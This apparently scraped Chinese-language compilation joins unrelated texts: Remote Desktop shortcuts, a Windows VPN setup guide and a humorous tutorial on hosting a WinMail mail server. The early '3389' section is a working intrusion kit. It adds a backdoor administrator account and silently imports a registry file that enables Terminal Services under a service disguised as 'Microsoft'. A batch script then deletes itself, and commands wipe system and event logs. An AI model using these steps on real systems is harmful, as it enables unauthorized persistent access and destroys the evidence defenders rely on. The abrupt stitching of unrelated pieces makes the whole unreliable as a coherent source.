CTRL+ALT+END 把“任务管理器”抓出来
CTRL+ALT+BREAK这个就是切换全屏显示。
CTRL+ALT+END 打开“Windows 安全”对话框。
ALT+PAGE UP 从左向右在程序之间切换。
ALT+PAGE DOWN 从右向左在程序之间切换。
ALT+INSERT 按启动顺序来回切换程序。
ALT+HOME 显示“开始”菜单。
CTRL+ALT+BREAK 在窗口(如果适用)和全屏显示之间切换客户端。
ALT+DELETE 显示窗口的弹出式菜单。
CTRL+ALT+减号 (-) 将客户端活动窗口的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 ALT+PrintScrn 键时的功能相同)。
CTRL+ALT+加号 (+) 将整个客户端窗口区域的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 PrintScrn 键时的功能相同)。
注意:
在NEC98 计算机中,这些快捷键在以下两种情况下会有些不同:
CTRL+ALT+BREAK由 F12 键代替。
CTRL+ALT+END 由 F15 键代替。
3389有关用户操作的基本命令
query user查询登陆用户
logoffID蹬出某用户
net user 查看所有用户
net user tty310 1506414 /add 添加一个用户,用户名tty310 密码1506414
net localgroup administrators tty310 /add 把tty310这个用户加到管理员组
net user tty310 查看用户tty310的情况
net user tty310 82073 将用户tty310的密码更改为82073
net user tty310 /delete删除tty310
net user tty310 /active:no禁用该用户
net user tty310 /active:yes 启用该用户
开3389
3389.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Deion"="Microsoft"
"DisplayName"="Microsoft"
3389.bat
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
重起
iisreset /reboot /timeout:00
reboot
删除日志
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
一、问题的提出
如图1所示,在单位有个私有地址为192.168.0.0的网络,各电脑是通过ADSL共享方式接入Internet,在家中有台电脑也通过ADSL访问Internet,现在想在家中随时安全地访问单位192.168.0.2这台机器,实现方法很多,最为安全的是通过VPN。
二、什么是VPN
以本例来说就是现在单位192.168.0.2这台机器上设置好VPN服务,在家中通过VPN客户端访问单位这台机器,建立连接后,这两台机器通信时就像在局域网中一样,比如:要在192.168.1.10这台电脑中下载192.168.0.2这台机器的文件(假设该机已设好FTP服务),可以直接在浏览器中键入:ftp://192.168.0.2下载文件了。虽然是通过Internet进行通信,但整个过程都是加密的,就像是在Internet中穿了一条只有两台机器才能通过的隧道,这就是VPN( Virtual Private Networks )虚拟专用网。
图1
三、实现方式
在VPN远程连接之前要做好两个准备。
第一要获得VPN服务器接入Internet的公共IP地址,如果是分配的静态IP,那就简单了,如果是动态IP,那必须在远程能随时获得这个IP地址,本例如图1,192.168.0.2这台机器的公网IP实际上就是ADSL猫接入Internet时,是ISP给自动分配的,且一般被分配到的是动态IP。 第二要做个端口映射,从图1的拓扑可以看出,本例是通作在ADSL猫中通过NAT转,接入Internet的,通过这种方式一定要在ADSL中作端口映射,由于windows 2003的VNP服务用的是1723端口,所以如图a,将1723端口映射到192.168.0.2这台设有VPN服务的机器。如果用的是直接拨号,那在防火墙中将这个端口放开就行了。
图a
1、登陆www.oray.net注册Oray护照,在护照底下申请域名(Oray提供了免费域名注册),激活域名对应的花生壳服务,下载花生壳客户端,在局域网内PC或服务器主机上安装花生壳客户端登陆在线,或是在集成花生壳动态域名解析服务的路由器上把护照名和密码填在路由器DDNS模块里并启用在线。
2、在相应的电脑上安装设置好VPN服务。
四、设置VPN服务
实现VPN的方式非常多,用带VPN功能的路由器或用Linux、windows操作系统等,在windows系统下用双网卡建立VPN服务器更容易实现、但要增加一块网卡。介绍这方面的内容很多,不再赘述。本文介绍的是在windows 2003中用单网卡来实现。下面介绍实际实现过程,首先是在192.168.0.2这台机器上配置VPN服务。
选择"开始"'"所有程序"'"管理工具"'"路由和远程访问"。
设置过程如图2至图9所示,出现图10界面就完成了单网的VPN服务器端的设置,这里特别指出的是用单网卡一定要在图6处选择"自定义配置",否则就进行不下去了。
邻居家的小蔡(小菜?!)MM家里刚装了宽带ADSL包月上网,就立刻飞奔过来拉我到她家,要我给她一个Gmail电子邮箱。说起电子邮箱,相信不少朋友都会有不下两三个吧?对于我们个人用户而言,一般情况我们只能选择像163或者搜狐之类的免费邮箱。于是我问小蔡:“你想不想用自己的计算机来架设一个邮件服务器呢?当别人问起你的电子邮件地址的时候,你回答出一个以你的名字而命名的电子邮箱,酷毙了!”。小蔡听了,眨巴眨巴着眼睛,看着我直点头。哎,可别以为只有电脑高手或者公司企业才能架设邮件服务器,事实上,咱小菜鸟也一样能飞出一片天空来,架设邮件服务器可是难不到我们di。嘿,说了那么多,估计大家都不耐烦了吧?别急,待我喝口水,用远程桌面连接到家里的电脑再慢慢道来。(小蔡:“……”)。
一.下载安装WinMail
1)首先有请我们的主角WinMail登场,WinMail全称是“Winmai Server”,是一功能强大,操作简单的邮件服务器软件。我们可以到http://www.magicwinmail.com/download.htm下载到WinMail的最新版本。未注册版本可以自由使用30天, 支持20个邮箱, 域名个数不限, 没有其它功能限制。(听到此处小蔡不禁掩手作哭泣状:“呜呜,怎么好东西都要给大洋?不理啦,人家没钱了。”见此况,偶心里不禁纳闷:“我记得上星期见你买了件400大元的外套,还直喊便宜的呀!”)
2)下载后,我们可以直接运行安装文件进行安装,WinMail的安装过程中和一般的软件类似,不过要注意,不要使用中文作为安装目录,否则可能会导致程序异常。下面只说明一些要注意的步骤,如安装组件、运行方式以及设置管理员的登陆密码等。WinMail主要的组件有服务器核心和管理工具两部份。服务器核心对主要是完成 SMTP, POP3, ADMIN, HTTP 等服务功能。而管理工具主要是负责设置邮件系统,如设置系统参数、管理用户、管理域等等,如下图。(小蔡:“听起来好像很复杂哦,看来偶又要用一个不眠之夜来学习了。T_T”)
(。)
3)服务器核心运行方式主要有两种:1)作为系统服务运行和单独程序运行。以系统服务运行。2)以单独程序运行适用于所有的Win32操作系统。在安装过程中,程序如果到检测到配置文件已经存在,会让您选择是否覆盖已有的配置文件。注意如果在软件升级的时候要选择好哦,不然到时候可别找我(找我也没钱赔你^_^),如下图。
在上一步中,如果您选择覆盖已有的配置文件或第一次安装,安装程序还会让您输入系统管理员密码和系统管理员邮箱的密码,当然,以后是可以修改的,如下图。
4)在安装完成后,管理员必须对系统进行一些初始化设置,系统才能正常运行。服务器在启动时如果发现还没有设置域名会自动运行快速设置向导,我们可以用它来简单快速的设置邮件服务器。这里我们建立一个oray@cicp.net的电子邮箱来为下文做示例,如下图。
这时候,小蔡纳闷道:“可我听我同学小黑说什么ADSL每次拨号上网后,IP地址都是不同的,那别人发邮件给我的时候,是如何解析cicp.net这个域名呢?”“嗯,不错嘛,这个问题问得好!”,我拍了拍小蔡的肩膀,故作深沉地说道(心里却为能吃到小蔡的豆腐而偷笑)。其实这个问题我们可以通过“花生壳”这个软件来解决这个问题。
二.下载花生壳,注册域名。
1)到http://www.oray.net下载安装花生壳的客户端。然后运行花生壳软件,点击“注册Oray护照”,根据弹出注册护照窗口提示进行注册。注册Oray护照完成后,使用所注册的护照名称和密码填入花生壳软件中进行登陆。
2)右击“免费域名”,来注册一个免费域名。这样以后不管上网后的IP地址怎么变化,只要记住该域名就可以连接相对应的IP地址了,方便极了。
3) 根据提示激活上一步所申请的免费域名花生壳动态DNS服务。当激活了域名以后时候,花生壳软件已经在线了。我们所申请的免费域名已经绑定到当前的公网IP地址,互联网可通过所申请的域名直接访问到当前的公网IP了。不过,在这里我们使用收费的顶级域名cicp.net作示范,因为顶级域名比起免费域名好记多了,而且价钱也不贵(比起使用收费邮箱划算得多)。如下图。
4 )最后我们还需要为顶级域名添加一个MX记录。打开网页到花生壳的主页http://www.oray.net,然后用花生壳护照的用户名和密码登陆控制台。点击“域名管理”后,右边会列出所有该护照所注册的域名。然后我们点击右边的“cicp.net”域名,会出现“添加域名记录”按钮。直接点击后,我们可以看到该域名下面已经多了一个“cicp.net”的子域名,点击子域名里面的“MX”,会出现一个窗口。因为我们的计算机在公网中没有固定的IP地址,所以在“邮件服务器”中我们输入“cicp.net”,“优先级”输入“10”后确定便可。如下图所示。
这时候小蔡又问道:“那什么是MX记录呢?”“MX记录也就是邮件交换记录,是域名在DNS服务器上的一个记录,用来告诉DNS服务器,在该域名中是哪台计算机在负责处理邮件”,我再一次“语重心长”地拍拍小蔡的肩膀说道。
三.使用管理工具设置
1)OK,现在域名方面也设置好了。在正式测试收发邮件之前,我们要先设置一下邮件服务器。启动桌面上的客户端管理工具,用户可以使用用户名(admin)和在安装时设定的密码进行登陆。
2)管理工具登录成功后,使用“系统设置”->“系统服务”可以查看系统的 SMTP、POP3、IMAP等服务是否正常运行。绿色的图标表示服务成功运行。红色的图标表示服务停止。如下图。
如果发现 SMTP、POP3、ADMIN、HTTP、IMAP或LDAP 等服务没有起动成功,请使用“系统日志”->“SYSTEM”查看系统的启动信息。如果出现启动不成功,一般情况都是端口被占用无法启动,关闭掉占用了端口的程序或者更换端口再重新启动相关的服务便可。例如:在Windows 2000 缺省安装时会安装IIS的SMTP服务,从而导致邮件系统SMTP服务运行不起来。我们把IIS的SMTP服务停止了,邮件系统SMTP服务便可恢复正常。
3)接下来我们设置邮件域,打开“域名设置”->“域名管理”。在这里可以添加新的域名或者对已经存在的域进行编辑,如下图。最后,我们可以使用“用户和组”->“用户管理”,来添加或删除邮箱。
四.收发信测试
以上各项均设置完成后,我们便可以以Web方式来收发邮件了。(小蔡:“哎呀,不知道为什么我有点心跳紧张的感觉。”偶听了,不禁心里美滋滋的想:“估计是因为我的关系吧,呵呵”。)因为WinMail默认使用6080来做Web端口号,所以我们直接打开IE,输入http://IP地址:6080,就可以访问Web邮箱了,如下图。因为Web方式的操作和163等免费邮箱是一模一样的,这里我们就不多说了。另外,这里我们注意到在网页右下角处可以看到本机的IP地址,这个在下面的文章我们会用到。
除了可以使用传统的Web方式收发邮件外,我们还可以使用常用的邮件客户端软件(如 Outlook Express, Outlook, FoxMail) 来测试。以 Outlook Express 为例,我们来说明如何设置邮件客户端软件。
1)打开Outlook Express,点击菜单“工具”中的“帐号”, 弹出如下图所示。在弹出的“Internet帐号”对话框中,单击“添加”按钮选择“邮件”,如下图(嘿嘿,我是用英文版的Windows,)。
2)进入到“Internet连接向导”填入用户的名字,点击下一步。然后填写您在邮件系统的增加的用户的电子邮件地址到“电子邮件地址”里。
3)接收邮件服务器选为“POP3”,然后在POP和SMTP服务器里面输入本机的IP地址。至于如何知道IP地址,文章上面已经提到过。
4)最后输入您的邮件系统中的用户的帐号名和密码,点击下一步,便可完成。
5)设置完成后,我们还需要修改帐号属性。我们可以点击菜单中的“工具”->“帐号”,选择好想要设定的帐号后,按“属性”。
5)如果邮件系统的SMTP服务激活了“发送认证功能”,则必须选中“服务器”选项卡里面的“外发邮件服务器”中的“我的服务器要求身份验证”选项。然后选择 “使用与接收件服务器相同的设置”确定便可。
6)最后,我们在Outlook Express里面写一封标题为“WinMail Test !”的邮件发送到126的邮箱,然后再从126回复一封标题为“126.com Test Mail”的邮件给服务器,来测试服务器的运行是否正常。如下图。
好了,到此为止,我们的邮件服务器已经架设成功!当然,更多的高级设置要留待大家慢慢研究了。回头一望,发现小蔡正在用无比钦佩的眼神望着我呢。没事,俺已经见惯这种场面,于是用手拨了拨头发做了个潇洒的动作。可过了一分钟后,哎,怎么她还在看我呢?怪不好意思的。待到我再认真地望了一下,才发现,原来她走神了……$@#$%